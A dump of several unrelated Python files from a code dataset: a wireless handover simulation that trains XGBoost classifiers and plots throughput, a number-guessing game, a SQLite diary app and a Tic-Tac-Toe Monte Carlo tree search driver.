matplotlib2tikz.save('figures/{}.tikz'.format(filename))\n\ndef plot_throughput_pdf(T):\n fig = plt.figure(figsize=(10.24, 7.68))\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 40\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['legend.fontsize'] = 'small'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}'] \n \n labels = [] \n\n num_bins = 40\n for data in T:\n data_ = T[data]\n\n counts, bin_edges = np.histogram(data_, bins=num_bins, density=True)\n pdf = counts #np.cumsum(counts) / counts.sum()\n ax = fig.gca()\n if data == 'mmWave only':\n style = 'r-'\n labels.append(data)\n elif data == 'Sub-6 only':\n style = 'b-'\n labels.append(data)\n else:\n continue\n ax.plot(bin_edges[1:], pdf, style, linewidth=2)\n \n plt.legend(labels, loc=\"best\") \n plt.grid()\n plt.xlabel('Throughput [Mbps]')\n plt.ylabel('Throughput pdf')\n plt.tight_layout()\n plt.savefig('figures/throughputs_pdf_{}.pdf'.format(p_randomness), format='pdf')\n matplotlib2tikz.save('figures/throughputs_pdf_{}.tikz'.format(p_randomness))\n \ndef plot_primary(X,Y, title, xlabel, ylabel, filename='plot.pdf'):\n fig = plt.figure(figsize=(10.24,7.68))\n\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 40\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['legend.fontsize'] = 'small'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}']\n \n plt.xlabel(xlabel)\n \n ax = fig.gca()\n ax.set_autoscaley_on(True)\n \n plot_, = ax.plot(X, Y, 'k^-') #, label='ROC')\n\n ax.set_ylabel(ylabel)\n \n plt.grid(True)\n fig.tight_layout()\n plt.savefig('figures/plot_{0}{1}.pdf'.format(p_randomness, filename), format='pdf')\n matplotlib2tikz.save('figures/plot_{0}{1}.tikz'.format(p_randomness, filename))\n \n# plt.show()\n\n##############################################################################\ndef train_classifier(df, r_training=0.8):\n dataset = df.copy()\n \n training, test = train_test_split(dataset, train_size=r_training, random_state=seed)\n \n eps = 1e-9\n X_train = training.drop('y', axis=1)\n y_train = training['y']\n X_test = test.drop('y', axis=1)\n y_test = test['y']\n\n w = len(y_train[y_train == 0]) / (eps + len(y_train[y_train == 1]))\n \n print('Positive class weight: {}'.format(w))\n \n classifier = xgb.XGBClassifier(seed=seed, learning_rate=learning_rate, n_estimators=1000, max_depth=8, scale_pos_weight=w, silent=True)\n #classifier.get_params().keys()\n \n # Hyperparameters\n alphas = np.linspace(0,1,2)\n lambdas = np.linspace(0,1,2)\n sample_weights = [0.5, 0.7]\n child_weights = [0, 10]\n objectives = ['binary:logistic']\n gammas = [0, 0.02, 0.04]\n \n hyperparameters = {'reg_alpha': alphas, 'reg_lambda': lambdas, 'objective': objectives, \n 'colsample_bytree': sample_weights, 'min_child_weight': child_weights, 'gamma': gammas}\n \n gs_xgb = GridSearchCV(classifier, hyperparameters, scoring='roc_auc', cv=K_fold) # k-fold crossvalidation\n gs_xgb.fit(X_train, y_train)\n clf = gs_xgb.best_estimator_\n \n y_pred = clf.predict(X_test)\n y_score = clf.predict_proba(X_test)\n\n try:\n roc_auc = roc_auc_score(y_test, y_score[:,1])\n print('The Training ROC AUC for this classifier is 
{:.6f}'.format(roc_auc))\n except:\n print('The Training ROC AUC for this classifier is N/A')\n\n return [y_pred, y_score, clf]\n\ndef predict_handover(df, clf, r_training):\n y_test = df['y']\n X_test = df.drop(['y'], axis=1)\n \n y_pred = clf.predict(X_test)\n y_score = clf.predict_proba(X_test)\n \n try:\n # Compute area under ROC curve\n roc_auc = roc_auc_score(y_test, y_score[:,1])\n print('The ROC AUC for this UE in the exploitation period is {:.6f}'.format(roc_auc))\n \n # Save the value\n f = open(\"figures/output_xgboost_{}.txt\".format(p_randomness), 'a')\n f.write('r_exploitation {0}, r_training {1}, ROC {2:.6f}\\n'.format(r_exploitation, r_training, roc_auc))\n f.close()\n\n y_pred=pd.DataFrame(y_pred)\n \n except:\n print('The ROC AUC for this UE in the exploitation period is N/A')\n y_pred = None\n roc_auc = None\n \n return y_pred, roc_auc\n##############################################################################\n \ndef get_beam_training_time(df, freq=28e9, horiz_beams=32, vertical_beams=8):\n return 10e-3 * horiz_beams * vertical_beams # 10 us in ms per beam.\n\ndef get_coherence_time(df, My, freq):\n # Returns beam coherence time in ms.\n c = 299792458 # speed of light\n \n BS_x, BS_y, BS_z = [235.504198, 489.503816, 6]\n np.random.seed(seed)\n\n n = df.shape[0] \n \n # Obtain D\n # alpha AoA equivalent random(0, pi) or 30 to 150 degrees\n\n D = ((df['lon'] - BS_x) ** 2 + (df['lat'] - BS_y) ** 2 + (df['height'] - BS_z) ** 2) ** 0.5\n Theta_n = 102 / My * math.pi/180 # beamwidth approximation for ULA ### 64 antennas in the aziumuth direction # 3 dB BW of antenna\n alpha = np.random.uniform(0, math.pi, size=n)\n T_B = D / (v_s * 1000/3600 * np.sin(alpha)) * Theta_n / 2.\n\n T_beam = np.array(T_B) * 1e3 # in ms\n T_beam = np.percentile(T_beam, 1) # take the 1st percentile of coherence\n \n if freq >= 28e9:\n print('INFO: mmWave mean channel coherence time is {} ms'.format(T_beam.mean()))\n return T_beam \n \n T_ofdm = np.ones(n) * c / (freq * v_s * np.sin(alpha) * 1000/3600) * 1e3 # in ms\n T_ofdm = np.percentile(T_ofdm, 1) \n \n T = np.minimum(T_ofdm, T_beam)\n\n print('INFO: sub-6 mean channel coherence time is {} ms'.format(T.mean()))\n return T\n\n#df_ = create_dataset() # only uncomment for the first run, when the channel consideration changes. Otherwise, no need.\ndf_ = pd.read_csv('dataset.csv')\n\ndf = df_.iloc[:max_users,:]\ndel df_\n\n# Feature engineering: add SNR to the computation:\nnoise_floor_35 = k_B * T * delta_f_35 * 1e3\nnoise_floor_28 = k_B * T * delta_f_28 * mmWave_BW_multiplier * 1e3 # in mW\n\nnoise_power_35 = 10 ** (Nf/10.) * noise_floor_35\nnoise_power_28 = 10 ** (Nf/10.) * noise_floor_28 \n\n# Instantaneous rates (Shannon)\ndf['Capacity_35'] = B_35*np.log2(1 + 10**(df['P_RX_35']/10.) / noise_power_35) / 1e6\ndf['Capacity_28'] = B_28*np.log2(1 + 10**(df['P_RX_28']/10.) 
/ noise_power_28) / 1e6\n\ndf = df[['lon', 'lat', 'height', 'Capacity_35', 'Capacity_28']]\n\nuser_mask = np.random.binomial(1, p_randomness, size=max_users) # 0 == user is 3.5, 1 == user is mmWave.\n\n# Source and Target are instantaneous rates.\ndf.loc[user_mask==0, 'Source'] = df.loc[user_mask==0, 'Capacity_35']\ndf.loc[user_mask==1, 'Source'] = df.loc[user_mask==1, 'Capacity_28']\ndf.loc[user_mask==0, 'Target'] = df.loc[user_mask==0, 'Capacity_28']\ndf.loc[user_mask==1, 'Target'] = df.loc[user_mask==1, 'Capacity_35']\n\n# Compute the Effective Achievable Rates\ncoherence_time_sub6 = get_coherence_time(df, My=8, freq=3.5e9)\ncoherence_time_mmWave = get_coherence_time(df, My=64, freq=28e9) \n\n#plot_pdf(coherence_time_mmWave, 'mmWave', coherence_time_sub6, 'sub-6')\ncoherence_time_mmWave = np.percentile(coherence_time_mmWave, 1)\ncoherence_time_sub6 = np.mean(coherence_time_sub6)\n\ngap_duration_sub6 = gap_fraction * coherence_time_sub6\ngap_duration_mmWave = gap_fraction * coherence_time_mmWave\n\nbeam_training_penalty_mmWave = get_beam_training_time(df, freq=28e9, horiz_beams=8, vertical_beams=32)\nbeam_training_penalty_sub6 = get_beam_training_time(df, freq=2.1e9, horiz_beams=8, vertical_beams=8)\n\n# Write the formulas in Paper\ncoeff_sub6_no_ho = (coherence_time_sub6 - beam_training_penalty_sub6) / coherence_time_sub6\ncoeff_mmWave_no_ho = (coherence_time_mmWave - beam_training_penalty_mmWave) / coherence_time_mmWave\ncoeff_sub6_ho = (coherence_time_sub6 - beam_training_penalty_sub6 - gap_duration_sub6) / coherence_time_sub6\ncoeff_mmWave_ho = (coherence_time_mmWave - beam_training_penalty_mmWave - gap_duration_mmWave) / coherence_time_mmWave\n\ndf.to_csv('figures/dataset_rates_{}.csv'.format(p_randomness))\n\n##############################################################################\ndf['Source_is_3.5'] = (df['Source'] == df['Capacity_35']) + 0\ndf['Source_is_28'] = (df['Source'] == df['Capacity_28']) + 0\n\nexploit_indices = np.random.choice(df.shape[0], N_exploit, replace=False)\n\nsub_6_capacities = df.loc[exploit_indices, 'Capacity_35'].copy()\nmmWave_capacities = df.loc[exploit_indices, 'Capacity_28'].copy()\n\n# Change the order of columns to put \ncolumn_order = ['lon', 'lat', 'height', 'Source', 'Target', 'Source_is_3.5', 'Source_is_28']\ndf = df[column_order]\n\n##############################################################################\n# 1) Optimal algorithm\n##############################################################################\ndf_optimal = df.copy()\ndf_optimal_ = df.copy()\n\n# Now, apply the handover algorithm\n# and compute the Effective Achievable Rate but no penalty for handover\n\na = df_optimal_.loc[(df_optimal_['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho\nb = df_optimal_.loc[(df_optimal_['Source_is_3.5'] == 1), 'Target'] * coeff_mmWave_no_ho\nc = df_optimal_.loc[(df_optimal_['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho\nd = df_optimal_.loc[(df_optimal_['Source_is_28'] == 1), 'Target'] * coeff_sub6_no_ho\n\n# The NaNs here are due to p_randomness values.\ndf_optimal_ = pd.DataFrame([a, b, c, d]).T\ndf_optimal_.fillna(0, axis=1, inplace=True)\n\n# Choose the max rate regardless\ndf_optimal.loc[:,'Capacity_Optimal'] = df_optimal_.apply(np.max, axis=1)\n \n# Sample r_exploit data randomly from df_optimal\nbenchmark_data_optimal = df_optimal.iloc[exploit_indices, :]\n\ndel df_optimal, a, b, d, df_optimal_\n\n##############################################################################\n# 2) Legacy 
algorithm\n##############################################################################\ndf_legacy = df.copy()\n\n# Handover is based on raw Shannon rates.\ndf_legacy.loc[:, 'HO_requested'] = (df_legacy.loc[:, 'Source'] < request_handover_threshold) + 0\ndf_legacy.loc[:, 'y'] = (df_legacy.loc[:,'Target'] >= df_legacy.loc[:,'Source']) + 0\n\n# No handover request means no handover granted\ndf_legacy.loc[df_legacy['HO_requested'] == 0, 'y'] = 0\n\n# Now, apply the handover algorithm\n# and compute the Effective Achievable Rate\n\n# Based on x_hr, if there was no handover, put the source effective rates back\ndf_legacy.loc[(df_legacy['HO_requested'] == 0) & (df_legacy['Source_is_3.5'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 0) & (df_legacy['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover requested.\ndf_legacy.loc[(df_legacy['HO_requested'] == 0) & (df_legacy['Source_is_28'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 0) & (df_legacy['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover requested.\n\n# Handover requested, but denied. Therefore, the source rate penalized by the gap\ndf_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 0) & (df_legacy['Source_is_3.5'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 0) & (df_legacy['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_ho # handover requested but denied, the throughput is the source.\ndf_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 0) & (df_legacy['Source_is_28'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 0) & (df_legacy['Source_is_28'] == 1), 'Source'] * coeff_mmWave_ho # handover requested but denied, the throughput is the source.\n\n# Handover requested, and granted. 
Therefore, the target rate penalized by the gap\ndf_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 1) & (df_legacy['Source_is_3.5'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 1) & (df_legacy['Source_is_3.5'] == 1), 'Target'] * coeff_sub6_ho # handover requested and granted, the throughput is the target.\ndf_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 1) & (df_legacy['Source_is_28'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 1) & (df_legacy['Source_is_28'] == 1), 'Target'] * coeff_mmWave_ho # handover requested and granted, the throughput is the target.\n##\n\n# Sample r_exploit data randomly from df_legacy\nbenchmark_data_legacy = df_legacy.iloc[exploit_indices, :]\n\ndel df_legacy\n\n##############################################################################\n# 3) Blind handover algorithm\n##############################################################################\ndf_blind = df.copy()\n\ndf_blind['HO_requested'] = pd.DataFrame((df_blind.loc[:,'Source'] <= request_handover_threshold), dtype=int)\ndf_blind['y'] = 1\n\n# No handover request means no handover granted\ndf_blind.loc[df_blind['HO_requested'] == 0, 'y'] = 0\n\n# Now, apply the handover algorithm\n# and compute the Effective Achievable Rate\n#df_blind.loc[(df_blind['y'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['y'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover, the throughput is the source.\n#df_blind.loc[(df_blind['y'] == 0) & (df_blind['Source_is_28'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['y'] == 0) & (df_blind['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover, the throughput is the source.\n\n# Based on x_hr, if there was no handover, put the source effective rates back\ndf_blind.loc[(df_blind['HO_requested'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover, the throughput is the source but no gap.\ndf_blind.loc[(df_blind['HO_requested'] == 0) & (df_blind['Source_is_28'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 0) & (df_blind['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover, the throughput is the source but no gap.\n\n# Handover requested, but denied. Therefore, the source rate penalized but no gap\ndf_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover, the throughput is the source but no gap.\ndf_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 0) & (df_blind['Source_is_28'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 0) & (df_blind['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover, the throughput is the source but no gap.\n\n# Handover requested, and granted. 
Therefore, the target rate penalized but no gap\ndf_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 1) & (df_blind['Source_is_3.5'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 1) & (df_blind['Source_is_3.5'] == 1), 'Target'] * coeff_mmWave_no_ho # blind handover, the throughput is the target but no gap.\ndf_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 1) & (df_blind['Source_is_28'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 1) & (df_blind['Source_is_28'] == 1), 'Target'] * coeff_sub6_no_ho # blind handover, the throughput is the target but no gap.\n\n##\n\n# Sample r_exploit data randomly from df_blind\nbenchmark_data_blind = df_blind.iloc[exploit_indices, :]\n\ndel df_blind\n\n##############################################################################\n# 4) Proposed algorithm\n##############################################################################\n\n# The height column must be deleted here before prediction is made\nheight = df['height']\ndf_proposed = df.drop(['height', 'Source_is_28'], axis=1) # delete the 28 column since it is equal to not 3.5.\n\ndf_proposed.loc[:, 'HO_requested'] = (df_proposed.loc[:, 'Source'] < request_handover_threshold) + 0\ndf_proposed.loc[:, 'y'] = (df_proposed.loc[:,'Target'] >= df_proposed.loc[:,'Source']) + 0\n\n# No handover request means no handover granted\ndf_proposed.loc[df_proposed['HO_requested'] == 0, 'y'] = 0\n\nif (p_randomness == 0 or p_randomness == 1):\n df_proposed = df_proposed.drop(['Source_is_3.5'], axis=1) # these two values will make the column of a single value.\n\n# Use this for the exploitation\ntrain_valid, benchmark_data_proposed = train_test_split(df_proposed, test_size=r_exploitation, random_state=seed)\n\n# The training and validation data get the infinity threshold (always request).\ntrain_valid['HO_requested'] = 1\n\ntrain_indices = pd.Int64Index(np.arange(df.shape[0])).difference(exploit_indices)\ntrain_valid = df_proposed.iloc[train_indices, :]\n\nbenchmark_data_proposed = df_proposed.iloc[exploit_indices, :]\n\nroc_graphs = pd.DataFrame()\nmisclass_graphs = pd.DataFrame()\n\nroc_auc_values = []\nmisclass_error_values = []\n\nmin_r_training = 1\nmin_score = np.inf\nbest_clf = None\nX = [1e-3,5e-3,7e-3,1e-2,3e-2,5e-2,7e-2,1e-1,3e-1,0.4,5e-1,7e-1] # note we removed 3e-3.\nfor r_t in X:\n try:\n [y_pred, y_score, clf] = train_classifier(train_valid, r_t)\n y_pred_proposed, score = predict_handover(benchmark_data_proposed, clf, r_t)\n y_score_proposed = clf.predict_proba(benchmark_data_proposed.drop(['y'], axis=1))\n y_test_proposed = benchmark_data_proposed['y']\n _, mu = get_misclassification_error(y_test_proposed, y_pred_proposed, y_score_proposed)\n\n if (mu < min_score):\n min_score = mu\n min_r_training = r_t\n best_clf = clf\n \n roc_auc_values.append(score)\n misclass_error_values.append(mu)\n \n roc_graphs = pd.concat([roc_graphs, pd.DataFrame(roc_auc_values)], axis=1)\n misclass_graphs = pd.concat([misclass_graphs, pd.DataFrame(misclass_error_values)], axis=1)\n \n except:\n roc_auc_values.append(np.nan)\n misclass_error_values.append(np.nan)\n pass\n\nroc_graphs.to_csv('figures/roc_output_{}.csv'.format(p_randomness), index=False)\nmisclass_graphs.to_csv('figures/misclass_output_{}.csv'.format(p_randomness), index=False)\n\n# Now generate data with the best classifier.\ny_pred_proposed, _ = predict_handover(benchmark_data_proposed, best_clf, min_r_training)\ny_score_proposed = 
best_clf.predict_proba(benchmark_data_proposed.drop(['y'], axis=1))\ny_test_proposed = benchmark_data_proposed['y']\n\n# Put back the height column\nbenchmark_data_proposed['height'] = height\n\n# Put back the Source data\nbenchmark_data_proposed['Source_is_3.5'] = df.loc[benchmark_data_proposed.index, 'Source_is_3.5']\nbenchmark_data_proposed['Source_is_28'] = df.loc[benchmark_data_proposed.index, 'Source_is_28']\n\n# Penalize the throughput rates aka Effective Achievable Rate\n# Use the same formula as the blind formula\n\n# Based on x_hr, if there was no handover, put the source effective rates back\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 0) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 0) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover, the throughput is the source but no gap.\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 0) & (benchmark_data_proposed['Source_is_28'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 0) & (benchmark_data_proposed['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover, the throughput is the source but no gap.\n\n# Handover requested, but denied. Therefore, the source rate penalized but no gap\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 0) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 0) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover, the throughput is the source but no gap.\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 0) & (benchmark_data_proposed['Source_is_28'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 0) & (benchmark_data_proposed['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover, the throughput is the source but no gap.\n\n# Handover requested, and granted. 
Therefore, the target rate penalized but no gap\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 1) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 1) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Target'] * coeff_mmWave_no_ho # blind handover, the throughput is the target but no gap.\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 1) & (benchmark_data_proposed['Source_is_28'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 1) & (benchmark_data_proposed['Source_is_28'] == 1), 'Target'] * coeff_sub6_no_ho # blind handover, the throughput is the target but no gap.\n##\n\n##############################################################################\n# Plotting\n##############################################################################\n\nplot_primary(X, roc_auc_values, 'ROC vs Training', r'$r_\\text{training}$', 'ROC AUC', filename='roc_vs_training_{}.pdf'.format(p_randomness))\nplot_primary(X, 100*np.array(misclass_error_values), '$\\mu vs Training', r'$r_\\text{training}$', r'$\\mu$ [\\%]', filename='misclass_vs_training_{}.pdf'.format(p_randomness))\nplot_confusion_matrix(y_test_proposed, y_pred_proposed, y_score_proposed)\n\n# Put the coherence time penalty for no handover regardess\nsub_6_capacities.iloc[:] *= coeff_sub6_no_ho\nmmWave_capacities.iloc[:] *= coeff_mmWave_no_ho\n\nbenchmark_data_optimal = benchmark_data_optimal.reset_index().drop(['index'], axis=1)\nbenchmark_data_legacy = benchmark_data_legacy.reset_index().drop(['index'], axis=1)\nbenchmark_data_blind = benchmark_data_blind.reset_index().drop(['index'], axis=1)\nbenchmark_data_proposed = benchmark_data_proposed.reset_index().drop(['index'], axis=1)\nsub_6_capacities = sub_6_capacities.reset_index().drop(['index'], axis=1)\nmmWave_capacities = mmWave_capacities.reset_index().drop(['index'], axis=1)\n\nbenchmark_data_proposed.loc[:,'y_true'] = benchmark_data_proposed['y'].copy()\nbenchmark_data_proposed['y'] = y_pred_proposed\n\n# Summaries\nf = open('figures/handover_metrics_{}.txt'.format(p_randomness), 'w')\nfor policy in ['proposed', 'legacy', 'blind']:\n d_ = eval('benchmark_data_{}'.format(policy))\n f.write('Policy {0} -- number of handovers requested in exploitation phase: {1:.0f}\\n'.format(policy, d_['HO_requested'].sum()))\n f.write('Policy {0} -- number of handovers granted in exploitation phase: {1:.0f}\\n'.format(policy, d_['y'].sum()))\nf.close()\n \ndata = pd.concat([benchmark_data_optimal['Capacity_Optimal'], benchmark_data_proposed['Capacity_Proposed'], benchmark_data_proposed['HO_requested'], benchmark_data_legacy['Capacity_Legacy'], benchmark_data_blind['Capacity_Blind'], sub_6_capacities['Capacity_35'], mmWave_capacities['Capacity_28']], axis=1, ignore_index=True)\ndata.columns = ['Optimal', 'Proposed', 'HO_requested', 'Legacy', 'Blind', 'Sub-6 only', 'mmWave only']\ndata.to_csv('figures/dataset_post_{}.csv'.format(p_randomness), index=False)\n\n#plot_throughput_pdf(data)\nplot_throughput_cdf(data[['Sub-6 only', 'mmWave only']], 'throughput_cdf_{}'.format(p_randomness))\n\ndiff = pd.DataFrame(data = (abs(data['mmWave only'] - data['Sub-6 only'])), columns=['Difference'])\nplot_throughput_cdf(diff, 'diff_cdf_{}'.format(p_randomness), 
legend=False)\n\n# 3D Plot pdf/CDF\nplot_joint_pdf(data['Sub-6 only'], data['mmWave only'])\nplot_joint_cdf(data['Sub-6 only'], data['mmWave only'])\n\ndata_policies = data[['Optimal', 'Proposed', 'Legacy', 'Blind']]\ndata_policies.dropna(inplace=True)\nplot_throughput_cdf(data_policies, 'throughputs_{}'.format(p_randomness))\n","sub_path":"main_xgboost.py","file_name":"main_xgboost.py","file_ext":"py","file_size_in_byte":43854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"140486430","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport random\n\ndef jd(a):\n p = random.randint(1,4)\n if a == p:\n return \"You guessed it\"\n elif a < p:\n return \"Too low\"\n else:\n return \"Too high\"\n\na = int(input())\njd(a)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"dz4/if_random_game.py","file_name":"if_random_game.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"187492432","text":"# -*- coding: utf-8 -*-\n\nimport sqlite3, sys, json\n\nconn = ''\n\ndef connect(db_name=None):\n if db_name is None:\n db_name = ':memory:' # create the database in RAM; it exists only while the connection is open\n conn = sqlite3.connect(db_name)\n conn.row_factory = dict_factory # return rows as dicts (reference to the factory function)\n return conn\n\ndef dict_factory(cursor, row):\n d = {}\n for i, col in enumerate(cursor.description):\n d[col[0]] = row[i]\n return d\n\ndef initialize(conn):\n with conn:\n cursor = conn.executescript('''\n CREATE TABLE IF NOT EXISTS diary(\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n name TEXT NOT NULL DEFAULT '',\n description TEXT NOT NULL,\n date DATETIME NOT NULL , \n status TEXT NOT NULL\n )\n ''')\n\n cursor2 = conn.execute('''\n INSERT INTO diary(name, description, date, status) \n VALUES ('purchase', 'buy milk', '07.03.2017 19:05', '0') \n ''')\n \n\n\ndef show_menu():\n print('''\n Diary. Choose an action:\n \n 1. List tasks\n 2. Add a task\n 3. Edit a task\n 4. Finish a task\n 5. Restart a task\n 6. Exit\n \n Enter a number:\n ''')\n\n\ndef show_message(func):\n def wrapper(*args, **kwargs):\n rez = func(*args, **kwargs)\n for i in rez:\n values = list(i.values())\n print('{} {} {} {} {}'.format(values[0], values[1], values[2], \n values[3], values[4]))\n return wrapper\n\n@show_message\ndef show_diary(status = '0'):\n with conn:\n cursor = conn.execute('''\n SELECT * FROM diary WHERE status=?\n ''', (status,))\n return cursor.fetchall()\n\ndef add_activity():\n st = '0'\n print('Enter the task name')\n name = input()\n print('Enter the task description')\n description = input()\n print('Enter the date')\n date = input()\n with conn:\n cursor = conn.execute('''\n INSERT INTO diary (name, description, date, status) \n VALUES (?,?,?,?) \n ''', (name, description, date, st))\n\n\ndef change_activity():\n print('Enter the task id')\n id_task = input()\n print('Enter the name')\n name = input()\n print('Enter the description')\n description = input()\n print('Enter the date')\n date = input()\n with conn:\n cursor = conn.execute('''\n UPDATE diary SET name=?, description=?, date=?, status=? WHERE id=?\n ''', (name, description, date, '0', id_task))\n\ndef change_status(rez = '', status = ''):\n show_diary(status)\n print('Specify the task id')\n id_task = input()\n with conn:\n cursor = conn.execute('''\n UPDATE diary SET status=? 
WHERE id=?\n ''', (rez, id_task))\n\ndef finish_activity():\n change_status(rez = '1', status = '0')\n \ndef return_activity():\n change_status(rez = '0', status = '1')\n\ndef action_exit():\n conn.close()\n sys.exit(0)","sub_path":"HW5/diary/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"214467120","text":"from __future__ import print_function\nfrom Tic_Tac_Toe import TicTacToe\nfrom Node import Node\nimport MCTS\nimport copy as cp\n\ndef main():\n BoardObj = TicTacToe()\n currNode = Node(expanded=False, visited=True, TotalSimualtionReward=0, totalNumVisit=1, TicTacToe=BoardObj,parent=None)\n print(\"Initial Board setting\")\n currNode.TicTacToe.print_board()\n while not currNode.Terminal:\n if currNode.TicTacToe.moveCnt & 1:\n x = int(raw_input('Enter row position\\n'))\n y = int(raw_input('Enter column position\\n'))\n TicTacToeObj = cp.deepcopy(currNode.TicTacToe)\n try:\n TicTacToeObj.make_move(x,y)\n except:\n continue\n nextNode = currNode.compareTo(TicTacToeObj.board)\n if nextNode is None:\n nextNode = Node(expanded=False, visited=True, TotalSimualtionReward=0, totalNumVisit=1, TicTacToe=TicTacToeObj,parent=None)\n else:\n nextNode = MCTS.MonteCarloTreeSearch(currNode, 0.1)\n print(\"After {} Move\".format(nextNode.TicTacToe.moveCnt))\n print(nextNode.TotalSimualtionReward)\n print(nextNode.TotalNumVisit)\n nextNode.TicTacToe.print_board()\n currNode = nextNode\n if currNode.TicTacToe.draw:\n print(\"Match is Drawn\")\n else:\n if currNode.TicTacToe.moveCnt & 1:\n print(\"First Player won\")\n else:\n print(\"Second Player won\")\n\nif __name__==\"__main__\":\n main()\n","sub_path":"Day2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"155906371","text":"import argparse\n\nfrom .base import BaseOperation\n\n\nclass Remove(BaseOperation):\n\tdef run(self, argv):\n\t\targs = 